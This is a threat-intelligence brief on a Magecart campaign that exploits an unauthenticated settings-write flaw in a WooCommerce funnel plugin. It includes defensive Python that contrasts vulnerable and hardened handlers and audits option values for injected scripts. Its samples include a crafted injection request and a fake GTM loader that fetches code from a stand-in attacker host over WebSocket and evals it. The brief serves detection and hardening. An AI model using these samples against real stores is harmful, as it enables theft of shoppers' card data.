ctipilot.ch

FunnelKit Funnel Builder for WooCommerce — unauthenticated checkout-endpoint injection, active Magecart skimmer on 40,000+ stores (no CVE assigned)

campaign · item:funnelkit-funnel-builder-for-woocommerce-actively-exploited-magecart-skimmer

Coverage timeline: 2 appearances, first 2026-05-17 → last 2026-05-17
Briefs: 1 distinct
Sources cited: 3 hosts
Sections touched: 2 (action_items, active_threats)
Co-occurring entities: 0 (no co-occurrence)

Story timeline

  1. 2026-05-17 · CTI Daily Brief — 2026-05-17 · active_threats
     First coverage. Sansec primary research + BleepingComputer + THN corroboration. Unauthenticated POST writes attacker JS into External Scripts; WebSocket-fed storefront-tailored payment skimmer. Patch FunnelKit 3.15.0.3+.
  2. 2026-05-17 · CTI Daily Brief — 2026-05-17 · action_items
     Action: patch FunnelKit 3.15.0.3+ on operator-managed WordPress and purge External Scripts.

Where this entity is cited

  • active_threats: 1
  • action_items: 1

Source distribution

  • bleepingcomputer.com: 1 (33%)
  • sansec.io: 1 (33%)
  • thehackernews.com: 1 (33%)

Items in briefs about FunnelKit Funnel Builder for WooCommerce — unauthenticated checkout-endpoint injection, active Magecart skimmer on 40,000+ stores (no CVE assigned) (1)

FunnelKit "Funnel Builder for WooCommerce" actively exploited as Magecart skimmer on 40,000+ WordPress stores — no CVE assigned

From CTI Daily Brief — 2026-05-17 · published 2026-05-17

Sansec published primary research on 2026-05-14 documenting active exploitation of an unauthenticated code-injection flaw in FunnelKit's Funnel Builder for WooCommerce plugin; BleepingComputer corroborated on 2026-05-15 and The Hacker News expanded the coverage on 2026-05-16 (Sansec, 2026-05-14; BleepingComputer, 2026-05-15; The Hacker News, 2026-05-16).

The vulnerable component is a publicly exposed POST endpoint for checkout-funnel session management that does not validate the caller's permissions. Per The Hacker News's summary of Sansec's research, "Funnel Builder includes a publicly exposed checkout endpoint that allows an incoming request to choose the type of internal method to run". An unauthenticated request can therefore invoke the internal method that writes the plugin's global settings and place arbitrary content in the External Scripts field (Settings > Checkout > External Scripts); whatever is stored there is emitted on every checkout page site-wide. ATT&CK mapping: T1190 Exploit Public-Facing Application for the initial write, and T1505.003 Web Shell as the nearest server-side persistence analogue (the skimmer is persisted in plugin settings rather than as a PHP file, so treat that sub-technique as approximate).

Sansec observed the live payload masquerading as a Google Tag Manager initialiser. The fake GTM loader pulls JavaScript from an attacker-controlled domain; that script opens a WebSocket to attacker C2 from the shopper's browser and retrieves a storefront-tailored skimmer that harvests card numbers, CVVs and billing data in real time during checkout. No CVE has been assigned. Affected: all FunnelKit Funnel Builder for WooCommerce versions before v3.15.0.3.

Why it matters to us: the unauthenticated-write-to-plugin-settings pattern is increasingly common across WordPress commerce plugins and is reachable by any internet scanner. Swiss/EU cantonal e-service portals, healthcare patient-payment systems and university e-commerce instances that run WooCommerce with this plugin installed are exposed until the operator acts.
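The flaw pattern described above, as an added illustration that is not FunnelKit's code (the plugin is PHP; this is a language-neutral sketch in Python): a public endpoint that dispatches to whatever internal method the request names, so an anonymous caller reaches the settings writer, beside a handler that allowlists the visitor-facing action and gates the privileged one on a capability. The class, method and setting names, the capability model (modelled on WordPress's manage_options) and the attacker.example host are all assumptions made for the illustration.

```python
"""Added illustration of the 'request chooses the internal method' flaw.

Not FunnelKit's code (that is PHP): a language-neutral sketch in Python.
Class, method and setting names, the capability model and attacker.example
are assumptions made for the illustration.
"""
from dataclasses import dataclass, field


@dataclass
class User:
    name: str
    capabilities: set = field(default_factory=set)


ANONYMOUS = User("anonymous")          # an unauthenticated visitor


class FunnelPlugin:
    """Toy plugin: one public checkout endpoint in front of several internal methods."""

    # Which actions visitors may call, and which capability the rest need
    # (modelled on WordPress's manage_options; a real handler would also
    # verify a nonce).
    PUBLIC_ACTIONS = {"start_checkout_session"}
    ADMIN_ACTIONS = {"save_global_settings": "manage_options"}

    def __init__(self):
        self.settings = {"external_scripts": ""}   # hypothetical global setting
        self.sessions = {}

    # --- internal methods; only the first is meant to be visitor-reachable ---
    def start_checkout_session(self, user, data):
        sid = len(self.sessions) + 1
        self.sessions[sid] = {"user": user.name, "cart": data.get("cart", [])}
        return {"session": sid}

    def save_global_settings(self, user, data):
        # Writes site-wide settings; anything stored in external_scripts
        # is later emitted on every checkout page.
        self.settings.update(data.get("settings", {}))
        return {"saved": True}

    # --- VULNERABLE: the request names the method, nobody checks the caller ---
    def handle_vulnerable(self, user, request):
        method = getattr(self, request["action"])
        return method(user, request)

    # --- HARDENED: explicit allowlist plus a capability gate ---
    def handle_hardened(self, user, request):
        action = request.get("action", "")
        if action in self.PUBLIC_ACTIONS:
            return getattr(self, action)(user, request)
        needed = self.ADMIN_ACTIONS.get(action)
        if needed is None:
            raise PermissionError(f"unknown action {action!r}")
        if needed not in user.capabilities:
            raise PermissionError(f"{action} requires {needed}")
        return getattr(self, action)(user, request)


# Constructed request shaped like the reported attack: an anonymous POST
# asking for the settings writer and supplying a fake GTM loader.
SKIMMER_REQUEST = {
    "action": "save_global_settings",
    "settings": {
        "external_scripts": "<script src='https://attacker.example/gtm.js'></script>",
    },
}


def demo():
    """Run the same anonymous request against both handlers.

    Returns (settings written by the vulnerable handler,
             settings left by the hardened handler,
             whether the hardened handler refused the request).
    """
    vulnerable = FunnelPlugin()
    vulnerable.handle_vulnerable(ANONYMOUS, SKIMMER_REQUEST)

    hardened = FunnelPlugin()
    try:
        hardened.handle_hardened(ANONYMOUS, SKIMMER_REQUEST)
        refused = False
    except PermissionError:
        refused = True
    return (vulnerable.settings["external_scripts"],
            hardened.settings["external_scripts"],
            refused)


if __name__ == "__main__":
    injected, clean, refused = demo()
    print("vulnerable handler stored:", injected)
    print("hardened handler stored:", repr(clean), "refused:", refused)
```

The point of the hardened version is that the set of reachable methods is a closed list chosen by the developer, not by the request; with an open dispatch, every method on the object (including ones added in a later release) silently becomes a public API.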
The WebSocket channel lets the C2 serve a different skimmer to each victim storefront, so static-IOC scanning of checkout HTML will miss it. Note that the WebSocket is opened by the shopper's browser, not by the WordPress PHP process, so server-side process or egress monitoring will not see it. Defenders should instead audit wp_options for unrecognised Funnel Builder external-script entries (any loader that looks like GTM but fetches from a host other than googletagmanager.com is a red flag), and watch checkout pages for wss:// connections to non-CDN endpoints, for example through a Content-Security-Policy connect-src directive with reporting or a synthetic checkout run through an intercepting proxy. Hardening: update to v3.15.0.3+ immediately; manually purge the External Scripts setting; deploy a server-side malware scanner against the plugin install path. Sansec's primary research plus two corroborating outlets clear the SINGLE-SOURCE rule.
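The wp_options audit above, as an added example that is not Sansec's or FunnelKit's tooling. The script does not rely on knowing the plugin's option names, which the brief does not give: it scans every exported option value for script elements, then flags script sources and WebSocket targets outside an operator allowlist, a GTM-style loader that fetches from a non-Google host, and common obfuscation primitives. The allowlist, the option names, the hostnames and the two tag snippets are constructed for the demo; the export step itself (for instance `wp option list --format=json`) is outside the script.

```python
"""Audit exported wp_options rows for injected checkout scripts.

Added example, not Sansec's or FunnelKit's tooling. It does not know the
plugin's real option names, so it scans every option value for <script>
elements. Allowlist, option names, hosts and snippets are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the operator expects on checkout pages (assumed; adjust per site).
ALLOWED_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com", "js.stripe.com"}

URL_RE = re.compile(r"""(?:https?:|wss?:)//[^\s'"<>)]+""", re.I)
GTM_MARKERS = ("gtm.js", "dataLayer", "gtm.start")   # what a GTM loader looks like


class ScriptExtractor(HTMLParser):
    """Collect (src, inline_body) for every <script> in an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.scripts, self._src, self._buf, self._in = [], None, [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in, self._buf = True, []
            self._src = dict(attrs).get("src")

    def handle_data(self, data):
        if self._in:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in = False


def audit_script(src, body):
    """Return indicator strings for one <script> element (empty if clean)."""
    hits = []
    urls = URL_RE.findall(body) + ([src] if src else [])
    for u in urls:
        p = urlparse(u)
        if p.scheme.lower() in ("ws", "wss"):
            hits.append(f"websocket to {p.hostname}")
        elif p.hostname and p.hostname not in ALLOWED_HOSTS:
            hits.append(f"unlisted host {p.hostname}")
    looks_like_gtm = any(m in body for m in GTM_MARKERS)
    if looks_like_gtm and any(h.startswith("unlisted host") for h in hits):
        hits.append("GTM-lookalike loader with non-Google script source")
    if re.search(r"new\s+WebSocket\s*\(", body):
        hits.append("WebSocket constructor in inline script")
    if re.search(r"\batob\(|String\.fromCharCode|\beval\(", body):
        hits.append("obfuscation primitive")
    return hits


def audit_options(rows):
    """rows: iterable of (option_name, option_value). Returns [(name, indicator)].

    If an export wraps the fragment in PHP serialization or JSON, unwrap it
    first; escaped quotes would confuse the HTML parser.
    """
    findings = []
    for name, value in rows:
        if "<script" not in value.lower():
            continue
        ex = ScriptExtractor()
        ex.feed(value)
        ex.close()
        for src, body in ex.scripts:
            findings.extend((name, hit) for hit in audit_script(src, body))
    return findings


# Constructed snippets: a normal GTM loader, and a lookalike that fetches
# from an attacker host and opens a WebSocket for the per-store payload.
LEGIT_GTM = ("<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),"
             "event:'gtm.js'});var j=d.createElement(s);j.async=true;"
             "j.src='https://www.googletagmanager.com/gtm.js?id='+i;d.head.appendChild(j);})"
             "(window,document,'script','dataLayer','GTM-XXXXXXX');</script>")
FAKE_GTM = ("<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),"
            "event:'gtm.js'});var j=d.createElement(s);"
            "j.src='https://cdn-gtm-cache.example/gtm.js?id='+i;d.head.appendChild(j);"
            "var ws=new WebSocket('wss://cdn-gtm-cache.example/ws');"
            "ws.onmessage=function(e){eval(atob(e.data));};})"
            "(window,document,'script','dataLayer','GTM-XXXXXXX');</script>")

SAMPLE_ROWS = [  # constructed export; the funnel option names are made up
    ("siteurl", "https://shop.example"),
    ("example_funnel_settings_clean", LEGIT_GTM),
    ("example_funnel_settings_injected", FAKE_GTM),
]

if __name__ == "__main__":
    for name, hit in audit_options(SAMPLE_ROWS):
        print(f"{name}: {hit}")
```

Only the injected row produces findings, each naming the option to purge; the genuine GTM snippet passes because its only URL resolves to an allowlisted host. A hit on "unlisted host" alone can be a legitimate third-party tag, so review it, but a GTM-lookalike loader or a WebSocket constructor inside a settings field is a strong signal on its own.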